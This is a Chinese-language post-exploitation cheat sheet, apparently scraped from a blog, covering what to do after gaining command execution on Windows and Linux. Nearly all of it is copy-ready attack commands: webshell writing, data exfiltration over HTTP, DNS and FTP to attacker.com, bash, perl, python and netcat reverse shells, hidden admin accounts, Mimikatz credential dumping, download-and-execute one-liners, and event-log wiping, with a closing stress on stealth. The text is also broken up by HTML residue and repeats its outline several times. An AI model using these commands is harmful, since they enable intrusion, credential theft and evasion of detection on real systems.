命令执行渗透测试技术总结<\/h1>

0x00 前言<\/h2>
本文总结了命令执行后的渗透测试技术，包括系统信息收集、回显利用、出网检测、反弹shell、密码抓取、文件下载执行等多种技术手段。适用于Windows和Linux系统环境。<\/p>

0x01 基础判断流程<\/h2>

在命令执行后，首先需要判断以下三个关键因素：<\/p>

系统类型<\/strong>：Windows还是Linux<\/li>
是否回显<\/strong>：命令执行结果是否可见<\/li>

能否出网<\/strong>：目标系统是否可以连接外部网络<\/li> <\/ol>
0x02 可回显情况下的利用<\/h2>
Windows系统<\/h3>

写入Webshell<\/strong>：<\/li> <\/ol>
echo<\/span> ^<^%<\/span>eval request^(<\/span>chr^(<\/span>35^)<\/span>)%^><\/span> > d:\test.asp <\/span><\/span>copy<\/span> c:\existing.jpg c:\existing.jpg.aspx <\/span><\/span><\/code><\/pre> 批量查找和修改文件<\/strong>：<\/li> <\/ol> for<\/span> \/F<\/span> %s in<\/span> ('dir \/s\/a-d\/b d:\*.asp'<\/span>) do<\/span> echo<\/span> 123 > %s <\/span><\/span><\/code><\/pre> 文件查找<\/strong>：<\/li> <\/ol> dir<\/span> \/s\/a-d\/b d:\*123456.asp <\/span><\/span><\/code><\/pre>Linux系统<\/h3> Base64写入Webshell<\/strong>：<\/li> <\/ol> echo PD9waHAgcGhwaW5mbygpOz8+ | base64 -d > test.php <\/span><\/span><\/code><\/pre> 文件查找<\/strong>：<\/li> <\/ol> locate login.php <\/span><\/span>find \/ -name "*.php"<\/span> -type f <\/span><\/span><\/code><\/pre>0x03 不可回显但能出网(OOB技术)<\/h2> Windows OOB技术<\/h3> 通过HTTP请求外带数据<\/strong>：<\/li> <\/ol> for<\/span> \/F<\/span> %s in ('whoami') do start http:\/\/10.10.10.10\/?user=%s <\/span><\/span><\/code><\/pre> FTP传输文件<\/strong>：<\/li> <\/ol> curl -T sensitive.txt ftp:\/\/attacker.com --user user:pass <\/span><\/span><\/code><\/pre> HTTP头外带数据<\/strong>：<\/li> <\/ol> wget --header="EVIL:$(whoami)"<\/span> http:\/\/attacker.com <\/span><\/span><\/code><\/pre> DNS外带数据<\/strong>：<\/li> <\/ol> ping %USERNAME%.attacker.com <\/span><\/span><\/code><\/pre>Linux OOB技术<\/h3> 通过HTTP请求外带数据<\/strong>：<\/li> <\/ol> curl http:\/\/attacker.com\/?user=<\/span>`<\/span>id`<\/span> <\/span><\/span>wget http:\/\/attacker.com\/?user=<\/span>`<\/span>ifconfig`<\/span> <\/span><\/span><\/code><\/pre> DNS外带数据<\/strong>：<\/li> <\/ol> ping -c 3<\/span> `<\/span>whoami`<\/span>.attacker.com <\/span><\/span><\/code><\/pre> 高级DNS外带技术<\/strong>：<\/li> <\/ol> cmd \/v \/c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell <\/span>$text=Get-Content output.hex;<\/span>$subdomain=<\/span>$text.replace(' ','');<\/span>$j=11111;foreach(<\/span>$i in <\/span>$subdomain){<\/span>$final=<\/span>$j.tostring()+'.'+<\/span>$i+'.attacker.com';<\/span>$j += 1; nslookup <\/span>$final }"<\/span> <\/span><\/span><\/code><\/pre>0x04 可出网情况下的利用<\/h2> Windows反弹技术<\/h3> PowerShell反弹<\/strong>：<\/li> <\/ol> IEX (New-Object Net.WebClient).DownloadString('http:\/\/attacker.com\/Invoke-PowerShellTcp.ps1'<\/span>);Invoke-PowerShellTcp -Reverse -IPAddress attacker_ip -port 4444 <\/span><\/span><\/code><\/pre> MSF生成payload<\/strong>：<\/li> <\/ol> msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>attacker_ip LPORT=<\/span>4444<\/span> -f exe -o payload.exe <\/span><\/span><\/code><\/pre> NC反弹<\/strong>：<\/li> <\/ol> nc -nv attacker_ip 4444 -e cmd.exe <\/span><\/span><\/code><\/pre> 添加用户<\/strong>：<\/li> <\/ol> net user hacker Password123! \/add <\/span><\/span>net localgroup administrators hacker \/add <\/span><\/span><\/code><\/pre> 开启远程桌面<\/strong>：<\/li> <\/ol> REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "<\/span>Server \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f <\/span><\/span><\/code><\/pre>Linux反弹技术<\/h3> Bash反弹<\/strong>：<\/li> <\/ol> bash -i >& \/dev\/tcp\/attacker_ip\/4444 0>&1<\/span> <\/span><\/span><\/code><\/pre> Perl反弹<\/strong>：<\/li> <\/ol> perl -<\/span>e 'use Socket;$i="attacker_ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("\/bin\/sh -i");};'<\/span> <\/span><\/span><\/code><\/pre> Python反弹<\/strong>：<\/li> <\/ol> python -<\/span>c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/span> <\/span><\/span><\/code><\/pre> NC反弹<\/strong>：<\/li> <\/ol> nc -e \/bin\/sh attacker_ip 4444<\/span> <\/span><\/span># 或当-e不可用时<\/span> <\/span><\/span>rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc attacker_ip 4444<\/span> >\/tmp\/f <\/span><\/span><\/code><\/pre> 非交互式添加用户<\/strong>：<\/li> <\/ol> useradd -m testuser <\/span><\/span>echo "testuser:password"<\/span> | chpasswd <\/span><\/span><\/code><\/pre>0x05 密码抓取技术<\/h2> Windows密码抓取<\/h3> Mimikatz<\/strong>：<\/li> <\/ol> mimikatz.exe "privilege::debug"<\/span> "sekurlsa::logonpasswords"<\/span> <\/span><\/span><\/code><\/pre> PowerShell调用Mimikatz<\/strong>：<\/li> <\/ol> IEX (New-Object Net.WebClient).DownloadString('http:\/\/attacker.com\/Invoke-Mimikatz.ps1'<\/span>);Invoke-Mimikatz <\/span><\/span><\/code><\/pre> LaZagne<\/strong>（多功能密码抓取工具）：<\/li> <\/ol> lazagne.exe all <\/span><\/span><\/code><\/pre>Linux密码抓取<\/h3> Mimipenguin<\/strong>：<\/li> <\/ol> .\/mimipenguin <\/span><\/span><\/code><\/pre>0x06 文件下载执行技术<\/h2> Windows下载执行<\/h3> PowerShell下载执行<\/strong>：<\/li> <\/ol> (new-object System.Net.WebClient).DownloadFile('http:\/\/attacker.com\/payload.exe'<\/span>,'C:\payload.exe'<\/span>);Start-Process 'C:\payload.exe'<\/span> <\/span><\/span><\/code><\/pre> Certutil下载<\/strong>：<\/li> <\/ol> certutil -urlcache -split -f http:\/\/attacker.com\/payload.exe C:\payload.exe && C:\payload.exe <\/span><\/span><\/code><\/pre> Bitsadmin下载<\/strong>：<\/li> <\/ol> bitsadmin \/transfer job http:\/\/attacker.com\/payload.exe C:\payload.exe <\/span><\/span><\/code><\/pre> Regsvr32远程执行<\/strong>：<\/li> <\/ol> regsvr32 \/s \/n \/u \/i:http:\/\/attacker.com\/payload.sct scrobj.dll <\/span><\/span><\/code><\/pre> Rundll32执行<\/strong>：<\/li> <\/ol> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"<\/span>;o=GetObject("script:http:\/\/attacker.com\/payload.sct"<\/span>);window.close(); <\/span><\/span><\/code><\/pre> MSHTA执行<\/strong>：<\/li> <\/ol> mshta http:\/\/attacker.com\/payload.hta <\/span><\/span><\/code><\/pre>Linux下载执行<\/h3> wget http:\/\/attacker.com\/payload -O \/tmp\/payload &&<\/span> chmod +x \/tmp\/payload &&<\/span> \/tmp\/payload <\/span><\/span># 或<\/span> <\/span><\/span>curl http:\/\/attacker.com\/payload -o \/tmp\/payload &&<\/span> chmod +x \/tmp\/payload &&<\/span> \/tmp\/payload <\/span><\/span><\/code><\/pre>0x07 提权技术<\/h2> Windows提权<\/h3> 利用已知漏洞提权<\/strong>：<\/li> <\/ol> IEX (New-Object Net.WebClient).DownloadString('http:\/\/attacker.com\/Invoke-ReflectivePEInjection.ps1'<\/span>);Invoke-ReflectivePEInjection -PEUrl http:<\/span>\/\/attacker.com\/ms15-051.exe -ExeArgs "cmd"<\/span> -ForceASLR <\/span><\/span><\/code><\/pre>Linux提权<\/h3> 提权检查工具<\/strong>：<\/li> <\/ol> .\/LinEnum.sh <\/span><\/span><\/code><\/pre> 内核漏洞利用<\/strong>：<\/li> <\/ol> .\/exploit <\/span><\/span><\/code><\/pre>0x08 清理痕迹<\/h2> Windows日志清理<\/h3> mimikatz.exe "privilege::debug"<\/span> "event::drop"<\/span> "event::clear"<\/span> <\/span><\/span><\/code><\/pre>0x09 参考资源<\/h2> Nishang PowerShell框架：https:\/\/github.com\/samratashok\/nishang<\/li> Empire框架：https:\/\/github.com\/EmpireProject\/Empire<\/li> PowerSploit：https:\/\/github.com\/PowerShellMafia\/PowerSploit<\/li> Windows下载执行技术：https:\/\/arno0x0x.wordpress.com\/2017\/11\/20\/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code\/<\/li> Linux提权工具：https:\/\/github.com\/rebootuser\/LinEnum<\/li> Linux漏洞利用：https:\/\/github.com\/SecWiki\/linux-kernel-exploits<\/li> GTFOBins：https:\/\/gtfobins.github.io\/<\/li> OOB技术手册：https:\/\/www.exploit-db.com\/docs\/english\/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf<\/li> <\/ol> 0x0A 总结<\/h2> 本文总结了命令执行后的各种渗透测试技术，包括信息收集、权限维持、横向移动等多个阶段的技术手段。实际使用时需要根据目标环境灵活选择合适的技术组合，并注意操作的隐蔽性和痕迹清理。<\/p>

命令执行渗透测试技术总结<\/h1>

0x00 前言<\/h2> 本文总结了命令执行后的渗透测试技术，包括系统信息收集、回显利用、出网检测、反弹shell、密码抓取、文件下载执行等多种技术手段。适用于Windows和Linux系统环境。<\/p>

0x02 可回显情况下的利用<\/h2>

0x03 不可回显但能出网(OOB技术)<\/h2>

0x04 可出网情况下的利用<\/h2>

0x05 密码抓取技术<\/h2>

0x06 文件下载执行技术<\/h2>

0x07 提权技术<\/h2>

0x08 清理痕迹<\/h2>

0x0A 总结<\/h2> 本文总结了命令执行后的各种渗透测试技术，包括信息收集、权限维持、横向移动等多个阶段的技术手段。实际使用时需要根据目标环境灵活选择合适的技术组合，并注意操作的隐蔽性和痕迹清理。<\/p>

0x00 前言<\/h2>
本文总结了命令执行后的渗透测试技术，包括系统信息收集、回显利用、出网检测、反弹shell、密码抓取、文件下载执行等多种技术手段。适用于Windows和Linux系统环境。<\/p>

0x0A 总结<\/h2>
本文总结了命令执行后的各种渗透测试技术，包括信息收集、权限维持、横向移动等多个阶段的技术手段。实际使用时需要根据目标环境灵活选择合适的技术组合，并注意操作的隐蔽性和痕迹清理。<\/p>